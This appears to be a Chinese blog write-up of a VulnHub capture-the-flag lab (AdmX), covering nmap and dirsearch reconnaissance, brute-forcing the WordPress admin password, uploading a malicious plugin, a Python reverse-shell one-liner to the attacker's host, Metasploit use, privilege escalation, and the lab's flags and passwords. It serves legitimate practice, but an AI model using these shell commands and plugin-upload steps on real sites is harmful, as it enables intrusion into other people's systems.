day4

咕咕咕，鸽了一天今天继续来打靶啦。
靶机：https://download.vulnhub.com/admx/AdmX_new.7z
攻击机：kali2022.2
目标：两个flag，root权限

信息收集

1.主机发现
这次使用nmap来进行主机发现
nmap -sn 10.0.3.1/24

不得不说用过的工具里面还是arp-scan和nmap最好用
发现ip地址：10.0.3.9

2.端口扫描/服务探测
全端口扫描
nmap -p- 10.0.3.9
仅开放了80端口
服务探测
nmap -p80 -sV 10.0.3.9
http ubantu Apache

3.web信息收集

根目录为Apache初始化页面
路径扫描
dirsearch -u http://10.0.3.9:80

看到了这个工具还可以指定字典，试一试
dirsearch -u http://10.0.3.9:80 -w /usr/share/dirb/wordlists/common.txt

报错了，不管他

得到信息：
网站很可能是个wordpress站点
尝试访问/wordpress

等了比较久，一直没重定向成功。
burp抓包看看

还没加载完，burp看看它在加载些什么东西

当访问的时候页面的返回包里显示硬编码写入了20次192.168.159.145，然后强制我去访问这个地址下的一些目录，调用一些js脚本。
因为当前kali机是访问不到这个网段的，所以访问页面加载的特别慢，并且很多页面资源加载不出来。
解决办法
先把这里清空

然后把返回包的响应头和响应body里所有强制我们访问的地址192.168.159.145都给他改成1靶机地址10.0.3.9。

再次访问

嗨嗨嗨

注释不了”，然后多加了一个闭合不了他也不报错，有没有小伙伴知道这是为啥的？

一番简单尝试无果后，前面目录扫描扫出来了一个login.php的疑似后台目录，去看看。

至此信息收集结束

web渗透

简单的弱口令，sql注入绕过手段尝试无法直接登陆，但是根据报错的不同我试出来了用户名为admin。
爆破吧，这里没有验证码，试试有没有设定多次失败锁定或者看看阀值在哪里。

漫长的10分钟之后通过返回包内容确认爆破出来了密码为adam14

看看利用点

文件上传

失败咯

404.php写一句话

失败咯

自己写shanque.php，当作插件上传，注意查看其他插件里wp的插件代码格式。

写好后根据wp的规则还要压缩

安装成功后激活

插件默认路径：
/wordpress/wp-content/plugins/shanque.php

又是个垃圾权限。。。。

换一个方法来反弹shell，还记得day1里的python反弹吗小伙伴们

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.3.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

来试试美少妇能不能也getshell，毕竟以及拿到了后台

使用第二个wp_admin_shell_upload

use 2
show options

至此web渗透结束

后渗透

信息收集

美少妇好像出了点问题

手动挡还是靠谱哈
刚刚在web渗透的第二步时，我想通过主题的404.php写入蚁剑的一句话失败了，现在再来试试。

、

为什么连个编辑的权限都没有啊

还是得升级成一个交互的shell

升级到交互shell

1.把当前获得的shell丢到后台
ctrl z

2.

还必须是bash才行，现在kali是zsh，切换成bash还要重启。。。

今天就先到这吧，有点麻，允许我在鸽一天，咕咕咕

继续更新
切换为bash

重启

重新python反弹shell

export SHELL=/bin/bash
export TERM=screen
export rows 38 columns 116
reset

再次编辑404.php发现已经可以i键进入编辑了

加入蚁剑默认的一句话

第二个shell获取成功。

提权

发现一个wordpress管理员的账号

发现下面有local.txt文件但是我们没有权限看
查看内核版本

内核漏洞提权尝试失败

sudo -l提权失败

在当前目录下发现wp-config.php文件

查看的得到数据库的账号密码信息
密码为wp_admin#123,试试能不能登陆到wp_admin

尝试登陆数据库

也不行
用刚burp跑出来的后台密码adam14试一试

拿到第一个flag
153495edec1b606c24947b1335998bd9

udp提权

7efd721c8bfff2937c66235f2d0dbac1

总结

主机发现（day1-4用到的有，arp-scan,arping,netdiscover,nmap)
端口探测、服务发现
目录扫描，暴力破解（如果访问一个页面加载特别慢，可以用burp抓包看看通信全过程，是不是强制让我们去访问别的地址去加载资源，如果是，可以在match and repalce那里修改。）
上传插件getshell
再获取一个稳定的shell
信息收集发现wpadmin账号
提权
第一个flag
udp提权
root权限，第二个flag。

用到的字典放附件了，感觉还不错